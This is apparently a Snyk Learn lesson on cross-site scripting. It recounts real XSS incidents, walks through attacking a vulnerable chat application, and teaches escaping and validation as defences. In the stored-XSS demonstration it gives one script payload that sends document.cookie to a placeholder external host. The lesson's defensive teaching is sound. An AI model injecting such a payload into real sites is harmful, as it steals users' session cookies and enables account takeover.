PREVIEW

Cross-site scripting

Executing untrusted JavaScript in a trusted context.

XSS: the basics

What is XSS?

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website. Since the script came from a trusted website, it cannot be distinguished from a legitimate script.

About this lesson

In this lesson we will demonstrate how an XSS attack can play out in a chat application. Next, we will dive deeper and explain the various forms of XSS. Finally, we will study vulnerable code and learn how to fix it.

But before we jump into the lesson, have you ever heard of a self-retweeting tweet?

XSS in action

A self-retweeting tweet

In 2014, an Austrian teenager @firoxl was experimenting with his feed on Twitter, trying to make it display the Unicode ‘heart’ character. By doing so, he inadvertently discovered that Twitter’s feed was vulnerable to an XSS attack! @firoxl immediately reported the issue to Twitter, but it was too late. His discovery was already making rounds on social media.

Less than two hours after @froxl’s discovery, a German IT student @derGeruhn published a Tweet that exploited XSS to ... retweet itself. Thus, the self-retweeting tweet was released into the world. It retweeted itself hundreds of thousands of times and affected thousands of Twitter accounts, including @NYTimes and @BBCBreaking. To end its reign, Twitter had to take their whole feed offline.

On the left you will find an image that shows the content of the self-retweeting tweet. The tweet contains malicious JavaScript code which gets executed every time someone views the tweet in their feed. The script accesses the HTML of the Twitter page, finds the “retweet” button, and presses it to retweet itself.

To achieve its nefarious purposes, the script exploits an XSS vulnerability. Not sure how it works? Read on!

A self-retweeting tweet

Our interactive widgets are optimized for larger screens. To access the complete Snyk Learn experience please switch to tablet or desktop.

XSS in action DO THIS

Vulnerable chat application

A company called startup.io decided to deploy an internal chat application for their employees. However, instead of using Slack, Discord or similar, the company chose to create its own chat service.

You are an engineer working for startup.io, and you’ve just learnt about the self-retweeting tweet that plagued Twitter a few years ago. You are curious to see if you could exploit your company’s chat web application in a similar way. You inform your in-house security team and your manager about your intentions, and then you get to work.

startup.io work chat

You, Emily

Emily

Hey.

20:10
Send icon

Fun fact Twitch chat hacked live by XSS

Does our chat example seem unrealistic to you? Well, a similar scenario happened in the real world! In 2018, a Twitch streamer dwangoAC attempted to use an alpha version of a Twitch chat wrapper software that was vulnerable to XSS. When his audience discovered the vulnerability, the stream quickly turned from a live video gaming event into a hackathon contest. See the recording of that Twitch session on YouTube.

XSS under the hood

Same-origin policy

To understand what happened with the chat application, we need to take a quick detour and explain how the browser executes HTML and JavaScript. Each time you visit a website, your browser downloads HTML, CSS, and JavaScript from the server that hosts the website. The browser interprets and displays HTML and CSS and executes JavaScript.

JavaScript is a powerful programming language–for example, it is entirely possible to use it to mine bitcoins inside your browser. However, by design, when a piece of JavaScript is downloaded from a website, it can only access secrets (e.g. cookies) associated with that website. For instance, JavaScript code downloaded from startup.io cannot access cookies set by yourbank.com. If it could, it would be straightforward to steal sensitive information persisted by other websites, such as session tokens.

This isolation is called the “same-origin policy“, and it is enforced by the browser. In a nutshell, XSS is a vulnerability that breaks the same-origin policy. And that’s what we did when we compromised the chat application. To understand what exactly happened, let’s take a look at the server code responsible for storing and displaying a chat message.

An XSS attack illustration which shows a hacker sending a malicious script to a website

Our interactive widgets are optimized for larger screens. To access the complete Snyk Learn experience please switch to tablet or desktop.

handleMessageSend is called on the backend each time any chat participant sends a message. Let’s consider what happens when we send a message such as

<script> new Image().src="http://yourdomain.io/" + document.cookie; </script>

Extra Stored vs reflected vs DOM-based XSS

The vulnerability you witnessed in the chat application is an example of stored XSS. It is called “stored” because the malicious JavaScript is persisted on the website's backend.

Reflected XSS and DOM-based XSS are two other types of XSS. Reflected XSS is similar to stored, except that the malicious JavaScript does not get persisted by the application server. Instead, it gets “reflected” to the user immediately. One typical example is a dynamic generation of an error page with the user input injected into the error message. In a DOM-based XSS, the malicious script is injected into HTML on the client-side by JavaScript’s DOM manipulation.

There is much more to say about XSS and its different types. This lesson is only an introduction to XSS–it barely scratches the surface. We will cover reflected XSS and DOM-based XSS in much more detail in future lessons.

What is the impact of XSS?

XSS allows hackers to inject malicious JavaScript into a web application. Such injections are extremely dangerous from the security perspective, and can lead to:

  • Stealing sensitive information, including session tokens, cookies or user credentials
  • Injecting multiple types of malware (e.g. worms) into the website
  • Changing the website appearance to trick users into performing undesirable actions

In addition, XSS is likely the most common web vulnerability. Do not take it lightly. Read on to learn how to mitigate XSS in your application.

Fun fact Samy, the fastest spreading virus ever

In 2005, a security researcher Samy Kamkar created an XSS worm named ‘Samy’. The worm was unleashed on the social networking site MySpace and affected over one million users within the first 20 hours of its lifetime, making it the fastest spreading virus of all time.

XSS mitigation

1. Find places where user input gets injected into a response

XSS is extremely popular for a reason: we programmers very often inject user-supplied data into the responses we send back to users. The first step to mitigate XSS is to find all places in your code where this pattern occurs. Input data might be coming from a database or directly from a user request. Any data which might have originated from a user at any point in the past is a suspect.

This is a daunting task and requires you to review your code carefully. Luckily, security scanners such as Snyk Code can automate most of the work for you.

2. Escape the output

Having identified all the places where XSS might be happening, it’s time to get your hands dirty and code your way out of danger. The first and the most important XSS mitigation step is to escape your HTML output. To do that, you should HTML-encode all dangerous characters in the user-controlled data before injecting that data into your HTML output.

For example, when HTML-encoded, the character < becomes &lt, and the character & becomes &amp etc. This way, the browser will safely handle the HTML-encoded characters, i.e. it will not assume they are part of the HTML structure of your page.

Remember to encode all dangerous characters. Don’t assume only a subset of characters needs to be escaped for your specific use case. Bad guys are very creative and will always find ways to bypass your assumptions.

Instead of writing an escape function by yourself, use well-proven libraries such as Apache Commons Text or OWASP Encoder. If you work with Spring, you can also use Spring's HtmlUtils.htmlEscape.

XSS mitigation where a hacker tries to inject a malicious script but the script's content is escaped

Our interactive widgets are optimized for larger screens. To access the complete Snyk Learn experience please switch to tablet or desktop.

3. Perform input validation

Be as strict as possible with the data you receive from your users. Before including user-controlled data in an HTTP response or writing it to a database, validate it is in the format you expect. Never rely on blocklisting—the bad guys will always find ways to bypass it!

For instance, in our chat application, we expect the messageId to be a valid UUID and the senderEmail to be a valid email. Note that in the example we changed generateMessageHTML to generateSenderHTML. This demonstrates two layers of defence to prevent XSS with the senderEmail parameter: we both validate it before saving it to a database and later escape it when injecting it into HTML.

We can use Apache Commons Validator which has validation functions for many common data types. For UUID validation, we can use the built-it UUID.fromString method from java.util.

Our interactive widgets are optimized for larger screens. To access the complete Snyk Learn experience please switch to tablet or desktop.

It is mandatory to perform type validation of user input before writing it to a database. However, it is also strongly recommended to validate data after reading it from the database. This can save us when the database gets compromised, and the malicious data gets injected through means other than the vulnerable API we secured in the previous paragraph. To validate data read from a database, you can use the validation techniques we presented above. Alternatively, we recommend using trusted database libraries that perform type validation out of the box, for example, ORM libraries.

4. Don’t put user input in dangerous places

The above mitigation is effective against situations where user input is used as the content of an HTML element (e.g. <div> user_input </div> or <p> user_input </p> etc.). However, there are certain locations where you should never put a user-controlled input. These locations include:

  • Inside the <script> tag
  • Inside CSS (e.g. inside the <style> tag)
  • Inside an HTML attribute (e.g. <div attr=user_input>)

There are some exceptions to the above rules, but explaining them goes beyond the scope of this lesson. If you do need to place user-controlled input inside any of the listed locations, please follow the OWASP Prevention Cheat Sheet for a more detailed advice.

Fun fact Internet Explorer had built-in support for XSS

In older versions of Internet Explorer, an XSS was possible with the use of ... images. In some cases, IE tried to guess the mime-type of a document. Unfortunately, IE did not excel at making such guesses. As a result, IE often mistook images for HTML files, and executed all JavaScript code embedded in an image file.

Keep learning

To learn more about XSS, check out some other great content produced by Snyk:

Congratulations

You’ve taken your first step into understanding XSS and preventing it from affecting your code! We hope you will apply your new knowledge wisely and make your applications safer. Please rate how valuable this lesson was and provide feedback to make it better. Also, make sure to check out our lessons on other common vulnerabilities.

Try Snyk. Be Secure

Are you sure that you don't have this vulnerability in your codebase?

Quick Start - Start For Free Chevron Right icon
Snyk Learn - Try Snyk